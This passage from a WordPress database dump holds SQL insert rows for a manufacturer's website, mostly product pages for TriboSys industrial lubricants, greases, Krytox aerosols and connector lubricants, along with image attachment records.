width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-14 11:37:46', '2016-09-14 11:37:46', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1642, 2, '2016-12-21 16:38:50', '2016-12-21 16:38:50', '<h3>TriboSys 2200 | Food Grade Silicone Aerosol</h3>\nTriboSys™ 2200 is a multi-purpose food grade silicone aerosol, NSF Registered spray lubricant for all industries. It can be safely used on machinery used for producing, manufacturing, packing, processing, preparing, treating, packaging, transporting, or holding food.\n\nIt may be used on food-processing equipment as a protective anti-rust film and prevent corrosion buildup problems. It works well as a release agent on gaskets and seals for tank closures and as a dry lubricant for machine parts and equipment where there is incidental contact with food. It prevents sticking and retards tarnish. It stops squeaks and also waterproofs, while prolonging the life of rubber components and other materials.\n\nTypical Applications:\nHinges, Latches, Chains, Rollers, Casters, Wheels, Delivery Chutes, Table Tops, Packaging Slides, Belts, Doors, Locks, Rubber Moldings, Drawers, and many other miscellaneous parts and equipment.\n\n<strong>Advantages</strong>\nLubricates\nResists Rust and Corrosion\nWaterproofs\n\n<strong>Technical Service:</strong>\nTo select the most suitable lubricant for your application please call Technical Service at 800.992.2424 (8-4 Eastern Time). In Canada, call 800.323.4621 (8-4 Eastern Time)', 'TriboSys 2200 | Food Grade Silicone Aerosol', '<strong>Food Grade Silicone Aerosol</strong>\n<br /><br />\nTriboSys 2200 is a multi-purpose, NSF Registered spray lubricant for all industries. It can be safely used on machinery used for producing, manufacturing, packing, processing, preparing, treating, packaging, transporting, or holding food. It may be used on food-processing equipment as a protective anti-rust film and prevent corrosion buildup problems. It works well as a release agent on gaskets and seals for tank closures and as a dry lubricant for machine parts and equipment where there is incidental contact with food.', 'inherit', 'closed', 'closed', '', '1100-autosave-v1', '', '', '2016-12-21 16:38:50', '2016-12-21 16:38:50', '', 1100, 'https://132.148.10.86/wordpress/1100-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1643, 2, '2016-09-14 12:08:28', '2016-09-14 12:08:28', '<h3>TriboSys™ 214X &amp; 215X Gear Box Lubricants</h3>\r\nThese Gear Box Lubricants deliver maximum protection against friction, wear and heavy shock loads. They have the excellent ability to absorb and remove heat from gear surfaces with minimal effect on gear oil performance.\r\n\r\nThe proprietary additive system of gear oils provide for extended drain intervals. Synthetic (214X Series) and synthetic blends (215X Series) will outlast conventional gear oils and reduce waste oil disposal.\r\n\r\nThey offer exceptional protection when subjected to extreme loads, speeds, temperature and environmental influences. They are cost effective and are designed to control and reduce maintenance cost\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Lower Energy Costs</li>\r\n 	<li>Increased Gear Box Efficiency</li>\r\n 	<li>High Operating Stability</li>\r\n 	<li>Non-corrosive to steel, copper, aluminum, bronze and bearing alloys.</li>\r\n 	<li>Immediate Leakage Reduction</li>\r\n 	<li>Demulsibility</li>\r\n</ul>\r\nThese oils have multi-purpose service. In addition to gear drive usage, these oils are used in bearing baths and reservoirs, on ways and slides, and all other applications specifying a gear lubricant. Low temperature operating ranges assures easy and smooth cold startups. These multi viscosity oils minimize oil inventory and incorrect oil selection. Each gear oil has superior adhesive properties to resist fling-off and leakage. Excellent water separation permits easy drain-off for uninterrupted year-round operation.', 'TriboSys™ 214X | Gear Box Lubricants', 'These oils deliver maximum protection against friction, wear and heavy shock loads. They have the excellent ability to absorb and remove heat from gear surfaces with minimal effect on gear oil performance.', 'publish', 'open', 'closed', '', 'tribosys-214x-gear-box-lubricants', '', '', '2016-12-21 18:38:42', '2016-12-21 18:38:42', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-214x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1644, 2, '2016-09-14 12:40:33', '2016-09-14 12:40:33', '<h3>TriboSys™ 216X Compressor Lubricant</h3>\r\nThese compressor lubricant (s) substantially, and consistently, reduce friction. Field studies show 5% to 15% savings in electrical consumption, which provides greater compressor reliability. They have better polar film lubricity and lower volatility than conventional oils. These features permit lower cylinder feed rates with less oil carryover into the air stream, and more complete air/oil separation. The result is cleaner system air, reducing problems in air operated equipment and manufacturing processes.\r\n\r\n<strong>Rotary Compressors</strong>\r\nIn rotary compressor applications, these oils increase air/oil separator life indefinitely, and extend rotary oil drain intervals up to 5,000 and 8,000 hours. Their low oil volatility ratings mean less make-up oil due to evaporation.\r\n\r\n<strong>Reciprocating Compressors</strong>\r\n216X Series of oils can reduce upper cylinder operating temperatures by as much as 40˚F/4˚C, reduce cylinder oil feed rates by as much as 40%, extend crankcase oil drain intervals by as much as 10 times, and extend valve and part life indefinitely.\r\n\r\n<strong>Compatibility</strong>\r\nThey are compatible with all known gasket and seal materials and are nonreactive with materials found downstream, such as polycarbonate bowls, elastomers and paints. These lubricants should be used exclusively and should not be mixed or dilutedwith existing product', 'TriboSys™ 216X | Compressor Lubricant', 'These compressor oils substantially, and consistently, reduce friction. Field studies show 5% to 15% savings in electrical consumption, which provides greater compressor reliability. They have better polar film lubricity and lower volatility than conventional oils.', 'publish', 'open', 'closed', '', 'tribosys-216x-compressor-lubricant', '', '', '2016-12-21 18:39:22', '2016-12-21 18:39:22', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-216x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1645, 2, '2016-09-14 15:16:42', '2016-09-14 15:16:42', '<h3>TriboSys™ 217X | Hydraulic Oils</h3>\r\nThese synthetically blended hydraulic oils provide maximum anti-wear protection for high pressure, high performance systems. The natural high viscosity indexes and the sophisticated hydraulic additive packages provide maximum oil cohesiveness, resulting in leakage reduction up to 90%.\r\n\r\nThese hydraulic oils increase drain intervals-typically 3 to 5 times longer than conventional oils, reducing waste disposal costs. The pressure and temperature stability permit continuous, around the clock system operation, without loss of equipment efficiency. These high performance oils increase production output and profit.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Anti-Wear-extended pump and component life</li>\r\n 	<li>Anti-Leak-Immediate leakage reduction up to 90%</li>\r\n 	<li>Superior Water and Oil Separation-Vent and drain for uninterrupted service</li>\r\n 	<li>Non-Foaming-Eliminate system chatter and erratic operation, minimizing production errors</li>\r\n 	<li>Rust and Corrosion Protection</li>\r\n 	<li>No sludge, varnish or gummy deposits</li>\r\n 	<li>High Performance-High pressure rating</li>\r\n 	<li>Reduced Operating Temperatures</li>\r\n 	<li>Power Reduction of 2-6% Average</li>\r\n 	<li>Seal, Gasket and Component Compatibility</li>\r\n 	<li>Superior Filterability</li>\r\n</ul>', 'TriboSys™ 217X | Hydraulic Oils', 'These synthetically blended hydraulic oils provide maximum anti-wear protection for high pressure, high performance systems. The natural high viscosity indexes and the sophisticated hydraulic additive packages provide maximum oil cohesiveness, resulting in leakage reduction up to 90%.', 'publish', 'open', 'closed', '', 'tribosys-217x-hydraulic-oils', '', '', '2016-12-21 18:40:05', '2016-12-21 18:40:05', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-217x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1646, 2, '2016-09-14 15:27:51', '2016-09-14 15:27:51', '<h3>TriboSys 218X | Roller Chain Oils</h3>\r\nThese powerful penetrating roller chain oils are used in applications where the lubricant penetrates to reach the pins and bushings located within the roller chain. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cables.\r\n\r\nThey protect equipment by retarding rust corrosion, and are excellent for aiding in the disassembly of rusted parts. They are non-oily, which prevents dust, lint and particulate contamination build up and minimize wear, noise, chain stretch and untimely equipment failure.\r\n<h4><strong>TriboSys™ 2180</strong></h4>\r\nThis oil is proven to extend chain life operating in wet conditions. It penetrates and leaves a water resistant, protective film on chain and part surfaces.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Anti-Wear Protection</li>\r\n 	<li>Excellent Rust and Corrosion Protection</li>\r\n 	<li>Water Resistant</li>\r\n</ul>\r\n<h4><strong>TriboSys™ 2181</strong></h4>\r\nA light chain oil fortified with a highly concentrated package of submicron sized molybdenum disulfide. It lubricates maximum and rapid penetration into pins, rollers and bushings, reducing wear and chain stretch.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Eliminates Contamination Buildup</li>\r\n 	<li>Penetrates to Loosen and Free Stiff Chains</li>\r\n 	<li>Cleans Chain</li>\r\n 	<li>Quickly Produces Flexible Chain Action</li>\r\n 	<li>Eliminates Chain Stick/Slip Motion</li>\r\n</ul>', 'TriboSys™ 218X | Roller Chain Oils', 'These powerful penetrating chain oils are used in applications where the lubricant penetrates to reach the pins and bushings located within the roller chain.', 'publish', 'open', 'closed', '', 'tribosys-218x-roller-chain-oils', '', '', '2016-12-21 18:40:47', '2016-12-21 18:40:47', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-218x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1647, 2, '2016-09-14 15:55:05', '2016-09-14 15:55:05', '<h3>TriboSys™ 221X | General Purpose Greases</h3>\r\nThis family of synthetically blended general purpose greases are formulated for a wide range of applications and for extremes of speed, temperature and pressure.\r\n<h4><strong>TriboSys™ 2210G</strong></h4>\r\nThis grease has high quality fluids with an inorganic thickener to produce excellent temperature stability.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Extends Lube Cycles</li>\r\n 	<li>Extends Bearing and Shaft Life</li>\r\n 	<li>Good for All Bearing Design</li>\r\n</ul>\r\n<h4><strong>TriboSys™ 2211G</strong></h4>\r\nThis high temperature grease is formulated for universal multi-purpose use. This lithium complex based grease has an exceptionally high drop point and excellent cold weather pumpability making it desirable for multi-purpose applications. Its texture is tacky-fibrous to resist the wiping and squeezing actions present in plain bearings, bushing and sleeves.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>High Temperature Protection</li>\r\n 	<li>Shear Stability</li>\r\n 	<li>Water and Steam Resistant</li>\r\n 	<li>Extreme Pressure and Wear</li>\r\n 	<li>Elevated Temperature Protection</li>\r\n 	<li>Attractive Red Color</li>\r\n</ul>\r\n<h4><strong>TriboSys™ </strong><strong>2212G</strong></h4>\r\nThis grease is a combination of synthetic fluids, high viscosity base oils, and special additives including a friction reducing molybdenum disulfide (MoS2) package.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Impervious to Water and Steam Washout</li>\r\n 	<li>Drop point Over 500˚F/260˚C</li>\r\n 	<li>Resistant to mild chemicals; acids, alkalines, detergents, soaps</li>\r\n 	<li>Extreme Pressure and Anti-Wear Protection</li>\r\n 	<li>Extends Equipment Life</li>\r\n</ul>\r\n<h4><strong>TriboSys™ 2213G</strong></h4>\r\nThis grease contains a Calcium Sulfonate base that provides inherent extreme pressure properties and unequaled protection against water, moisture, condensation, rust and corrosion attacks. It has exceptional oxidation and mechanical stability. The high drop point assures superior protection at continuous, elevated temperatures. It contains no heavy metals and has excellent compatibility with other greases.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Excellent Rust and Corrosion Protection</li>\r\n 	<li>High Drop Point</li>\r\n 	<li>Water Resistant</li>\r\n 	<li>Excellent in Corrosive Environment</li>\r\n</ul>\r\n&nbsp;', 'TriboSys™  221X | General Purpose Greases', 'This family of synthetically blended greases are formulated for a wide range of applications and for extremes of speed, temperature and pressure.', 'publish', 'open', 'closed', '', 'tribosys-221x-general-purpose-greases', '', '', '2016-12-21 18:35:46', '2016-12-21 18:35:46', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-221x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1648, 2, '2016-09-14 17:23:07', '2016-09-14 17:23:07', '<h3>TriboSys 222X | High Temperature Greases</h3>\r\nThese high temperature greases are formulated to provide continuing lubrication long after conventional lubricants have failed. They are problem solvers for bearings exposed to very high temperatures and various forms of contamination.\r\n<h4><strong>TriboSys™ 2220G</strong></h4>\r\nThis high temperature grease has a non-drip feature that makes it desirable for high speeds and temperatures. It is made from a combination of an ashless, inorganic thickener and a blend of synthetic base fluids which were originally developed for jet aircraft use.\r\n\r\n<strong>Advantages</strong>\r\n• High Speed\r\n• Non-Carbonizing\r\n• Cleans as it Lubricates\r\n<h4><strong>TriboSys™ 2221G</strong></h4>\r\nThis high temperature grease has a combination of medium viscosity synthetic base oils, anti-wear additives and high temperature solids. It is formulated to handle the mid to high ranges of speed and temperature. Exceptional resistance to heat and moisture and ideal for applications where drippage cannot be tolerated.\r\n\r\n<strong>Advantages</strong>\r\n• Controlled Volatility Extends Lube Cycles\r\n• Medium to High Speeds\r\n• Plain, Journal and Anti-Friction Bearings\r\n• Lubricating Solids\r\n<h4><strong>TriboSys™ 2222G</strong></h4>\r\nThis high temperature grease contains high viscosity synthetic base fluids with an ashless inorganic thickener which is designed for high temperature-sealed-for-life bearings. It has exceptional in oven and tenter frame bearing usage where temperatures constantly exceed 350˚F/177˚C.\r\n\r\n<strong>Advantages</strong>\r\n• Red Color for Easy Identification\r\n• Slow to Medium Speeds\r\n• Extended Lube Cycles\r\n• Extends Both Bearing and Shaft Life\r\n• Low Base Oil Volatili', 'TriboSys™ 222X | High Temperature Greases', 'These greases are formulated to provide continuing lubrication long after conventional lubricants have failed. They are problem solvers for bearings exposed to very high temperatures and various forms of contamination.', 'publish', 'open', 'closed', '', 'tribosys-222x-high-temperature-greases', '', '', '2016-12-21 18:42:40', '2016-12-21 18:42:40', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-222x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1649, 2, '2016-09-14 18:44:28', '2016-09-14 18:44:28', '<h3>TriboSys™ 223X | Multi-Purpose Food Grade Greases</h3>\r\nThese food grade lubricants are comprised of FDA (Food &amp; Drug Administration) approved ingredients in compliance with CFR, Title 21, Paragraph 178.3570 of the FDA guidelines. These virtually tasteless, odorless, nontoxic lubricants meet the demanding operating conditions of modern Food and Pharmaceutical facilities. They have exceptional anti-wear and load carrying abilities, while being fortified with approved oxidation inhibitors to maximize resistance to chemical changes, resulting in a longer protective life. These greases have exceptional resistance to gumming and the formation of other harmful deposits, and are used extensively as anti-rust and anti-corrosion coatings for all types of surfaces located in production areas\r\n\r\n<strong style="font-size: 14.4px;">2230FG</strong>\r\n\r\nThis grease is a multi-purpose bearing grease that possesses an excellent combination of temperature and load carrying abilities, providing a tough, durable lubricating film between bearing surfaces. The non-melt feature gives maximum retention and mechanical stability in all bearing designs, guaranteeing extended bearing and shaft life.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Odorless and Tasteless</li>\r\n 	<li>Extends Lube Cycles</li>\r\n 	<li>Extra Load Protection</li>\r\n 	<li>Water Clear Color</li>\r\n</ul>\r\n<strong>2231FG</strong>\r\n\r\nThis grease has a combination of medium viscosity synthetic base oils, anti-wear additives and high temperature solids. It is formulated to handle the mid to high ranges of speed and temperature. Exceptional resistance to heat and moisture and ideal for applications where drippage cannot be tolerated.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Controlled Volatility Extends Lube Cycles</li>\r\n 	<li>Medium to High Speeds</li>\r\n 	<li>Plain, Journal and Anti-Friction Bearings</li>\r\n 	<li>Lubricating Solids</li>\r\n</ul>\r\n<strong>2232FG</strong>\r\n\r\nA synthetic formula that provides extra protection in extreme temperature operating ranges. It is suitable for all low temperature jobs, such as cold storage and freezer equipment. Because of its durability in all applications, it can be used throughout plants as the all-purpose bearing grease.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>High Temperature Protection</li>\r\n 	<li>Pliable Down to -65˚F/-54˚C</li>\r\n 	<li>Anti-Wear Properties</li>\r\n 	<li>Maximum Part Life</li>\r\n 	<li>Extended Lube Cycles</li>\r\n</ul>\r\n<strong>2233FG</strong>\r\n\r\nAn NSF/USDA registered grease that provides the ultimate in corrosion protection. Totally impervious to water, steam and salt water washout. This high performance Food Grade Grease contains no heavy metals and will operate over a wide temperature range. It has extreme pressure properties that excel when all other Food Grade Greases fail.\r\n\r\nAdvantages:\r\n<ul>\r\n 	<li>Unsurpassed Corrosion Protection</li>\r\n 	<li>Low Temperature Pumpability</li>\r\n 	<li>Wide Operating Temperature Range</li>\r\n 	<li>Excellent Oxidation Stability</li>\r\n</ul>', 'TriboSys™ 223X | Multi-Purpose Food Grade Greases', 'These food grade lubricants are comprised of FDA (Food &amp; Drug Administration) approved ingredients in compliance with CFR, Title 21, Paragraph 178.3570 of the FDA guidelines. These virtually tasteless, odorless, nontoxic lubricants meet the demanding operating conditions of modern Food and Pharmaceutical facilities.', 'publish', 'open', 'closed', '', 'tribosys-223x-food-grade-greases', '', '', '2016-12-21 18:43:08', '2016-12-21 18:43:08', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-223x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1650, 2, '2016-09-14 19:15:57', '2016-09-14 19:15:57', '', 'General Purpose Oils', '', 'inherit', 'open', 'closed', '', 'tribosys-general-purpose-oil', '', '', '2016-12-21 18:30:34', '2016-12-21 18:30:34', '', 1637, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-general-purpose-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1651, 2, '2016-09-14 19:21:01', '2016-09-14 19:21:01', '', 'Chain Oils', '', 'inherit', 'open', 'closed', '', 'tribosys-high-temperature-chain-oil', '', '', '2016-12-21 16:21:06', '2016-12-21 16:21:06', '', 1638, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-high-temperature-chain-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1652, 2, '2016-09-14 19:23:19', '2016-09-14 19:23:19', '', 'Gear Box Lubricants', '', 'inherit', 'open', 'closed', '', 'tribosys-gear-box-lubricant', '', '', '2016-12-21 16:04:04', '2016-12-21 16:04:04', '', 1643, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-gear-box-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1653, 2, '2016-09-14 19:27:11', '2016-09-14 19:27:11', '', 'Krytox lubricants', '', 'inherit', 'open', 'closed', '', 'tribosys-compressor-lubricant', '', '', '2016-09-29 13:56:01', '2016-09-29 13:56:01', '', 1644, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-compressor-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1654, 2, '2016-09-14 19:30:50', '2016-09-14 19:30:50', '', 'Hydraulic Oils', '', 'inherit', 'open', 'closed', '', 'tribosys-hydraulic-oil', '', '', '2016-12-21 16:15:58', '2016-12-21 16:15:58', '', 1645, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-hydraulic-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1655, 2, '2016-09-14 19:46:31', '2016-09-14 19:46:31', '', 'Roller Chain Oils', '', 'inherit', 'open', 'closed', '', 'tribosys-chain-oil', '', '', '2016-12-21 16:24:49', '2016-12-21 16:24:49', '', 1646, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-chain-oil.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1656, 2, '2016-09-14 20:02:59', '2016-09-14 20:02:59', '', 'Food Grade Greases', '', 'inherit', 'open', 'closed', '', 'tribosys-food-grade', '', '', '2016-12-21 18:23:49', '2016-12-21 18:23:49', '', 1649, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-food-grade.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1658, 2, '2016-09-15 11:59:44', '2016-09-15 11:59:44', '', 'General Purpose Greases', '', 'inherit', 'open', 'closed', '', 'tribosys-general-grease', '', '', '2016-12-21 16:52:54', '2016-12-21 16:52:54', '', 1647, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-general-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1659, 2, '2016-09-15 12:02:24', '2016-09-15 12:02:24', '', 'High Temperature Greases', '', 'inherit', 'open', 'closed', '', 'tribosys-high-temperature-grease', '', '', '2016-12-21 16:44:17', '2016-12-21 16:44:17', '', 1648, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-high-temperature-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1660, 2, '2016-09-15 12:08:07', '2016-09-15 12:08:07', '', 'Krytox', '', 'inherit', 'open', 'closed', '', 'tribosys-industrial', '', '', '2016-09-28 13:27:37', '2016-09-28 13:27:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-industrial.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1661, 2, '2016-09-15 12:09:46', '2016-09-15 12:09:46', '', 'tribosys-1200-aerosol-krytox', '', 'inherit', 'open', 'closed', '', 'tribosys-1200-aerosol-krytox', '', '', '2016-09-15 12:09:46', '2016-09-15 12:09:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-1200-aerosol-krytox.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1662, 2, '2016-09-15 12:22:39', '2016-09-15 12:22:39', '', 'TriboSys 110XN (Aerosol)', 'TriboSys Thin Film Lube contains Krytox GPL oils, which are packaged into convenient eight or fourteen ounce aerosols. This packaging provides an easy solution for lubricating hard to reach places with pinpoint accuracy. The low surface tension of the solvent carries the oil into tight crevices. Also available with Krytox grease.', 'publish', 'open', 'closed', '', '110xn', '', '', '2016-11-28 20:04:42', '2016-11-28 20:04:42', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1662', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1663, 2, '2016-09-15 12:22:18', '2016-09-15 12:22:18', '', 'tribosys-110xn-krytox-oil-grease', '', 'inherit', 'open', 'closed', '', 'tribosys-110xn-krytox-oil-grease', '', '', '2016-09-15 12:22:18', '2016-09-15 12:22:18', '', 1662, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-110XN-krytox-oil-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1664, 2, '2016-09-15 12:28:13', '2016-09-15 12:28:13', 'The PFPE Synthetic Oils, in addition to having a wide operating temperature range (-94°F to 550°F), are chemically inert, non-migrating, insoluble in hydrocarbons, water, steam, solvents, disinfectant, both acid and caustic types. They have low vapor pressure and low out-gassing characteristics. They are oxygen compatible, which makes it safe for oxygen service. Reduces friction and wear. Extends service life of critical components.', 'TriboSys 110XNB (Aerosol)', 'TriboSys Thin Film Lube contains Krytox GPL oils. This product deposits a low surface solvent that enables the oil to travel into tight crevices. It is ideally suited for trolley system chain pins and wheels, conveyor belt chains, threads, and bolts.', 'publish', 'open', 'closed', '', 'tribosys-110xnb', '', '', '2016-11-28 20:04:11', '2016-11-28 20:04:11', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-110xnb/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1665, 2, '2016-09-15 12:32:09', '2016-09-15 12:32:09', '', 'tribosys-110xnb-krytox-oil-grease', '', 'inherit', 'open', 'closed', '', 'tribosys-110xnb-krytox-oil-grease', '', '', '2016-09-15 12:32:09', '2016-09-15 12:32:09', '', 1664, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-110xnb-krytox-oil-grease.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1666, 2, '2016-09-15 12:38:24', '2016-09-15 12:38:24', 'These PFPE/PTFE Greases, in addition to having a wide operating temperature range (-94°F to 550°F), are chemically inert, non-migrating, insoluble in hydrocarbons, water, steam and solvents. They have low vapor pressure and low out-gassing characteristics. They are oxygen compatible, which makes it safe for oxygen service.', 'TriboSys 120X (Aerosol)', 'TriboSys Thin Film Lube contains Krytox GPL greases (PFPE oil thickened with PTFE), which are packaged into convenient eight or fourteen ounce aerosols. This packaging provides an easy solution for lubricating hard to reach places with pinpoint accuracy. The low surface tension of the solvent carries the grease into tight crevices. Also available with Krytox oils.', 'publish', 'open', 'closed', '', 'tribosys-110xnb-copy', '', '', '2016-11-28 20:05:06', '2016-11-28 20:05:06', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-110xnb-copy/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1667, 2, '2016-09-15 12:43:17', '2016-09-15 12:43:17', '', 'tribosys-120x-krytox-grease-aerosol', '', 'inherit', 'open', 'closed', '', 'tribosys-120x-krytox-grease-aerosol', '', '', '2016-09-15 12:43:17', '2016-09-15 12:43:17', '', 1666, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/tribosys-120x-krytox-grease-aerosol.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1668, 2, '2016-09-15 13:21:15', '2016-09-15 13:21:15', 'Cleans, lubricates and protects multi-pin connectors. Reduces insertion force, greatly increasing connection cycles. Extends connector life by preventing corrosion and galling. Contains a 6-ring polyphenyl ether lubricant which provides long-lasting protection against oxidation. No interference with electrical continuity. Thermal stability to 836°F/447°C. This 6-ring PPE can provide a 20-year film life where temperatures do not exceed 230°F/110°C. Contains no silicones and is non-migrating. Available with an ultraviolet (UV) indicator. Nonflammable. No ODC (ozone depleting chemicals). Custom packaging available. NSN 6850-01-538-3496 (Qt).', 'MS-381HC', 'By combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, a formulation that provides the most advanced total treatment for connectors.', 'publish', 'open', 'closed', '', 'ms-381hc', '', '', '2017-07-06 16:29:19', '2017-07-06 16:29:19', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1668', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1669, 2, '2016-09-15 13:19:45', '2016-09-15 13:19:45', '', 'connector-lubricant', '', 'inherit', 'open', 'closed', '', 'connector-lubricant', '', '', '2016-09-15 13:19:45', '2016-09-15 13:19:45', '', 1668, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/connector-lubricant.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1670, 2, '2016-09-15 13:23:16', '2016-09-15 13:23:16', 'By combining the superior lubricating qualities of Polyphenyl Ether with the cleaning power of a hydrofluoroether azeotrope, Miller-Stephenson has created Connector Lubricant, a formulation that provides the most advanced total treatment for connectors.', 'MS-381H', 'Same general application as MS-381HC. Contains a lower concentration of 6-ring polyphenyl ether. No ODC (ozone depleting chemicals). Custom packaging available. NSN 6850-01-519-8521 (16 oz Aerosol) and NSN 6850-01-367-8095 (16 oz Aerosol MS-381H UV).', 'publish', 'open', 'closed', '', 'ms-381h', '', '', '2017-07-06 16:33:04', '2017-07-06 16:33:04', '', 0, 'https://132.148.10.86/wordpress/product/ms-381h/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1671, 2, '2016-09-15 13:24:40', '2016-09-15 13:24:40', '', 'connector-lubricant-2', '', 'inherit', 'open', 'closed', '', 'connector-lubricant-2', '', '', '2016-09-15 13:24:40', '2016-09-15 13:24:40', '', 1670, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/connector-lubricant-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
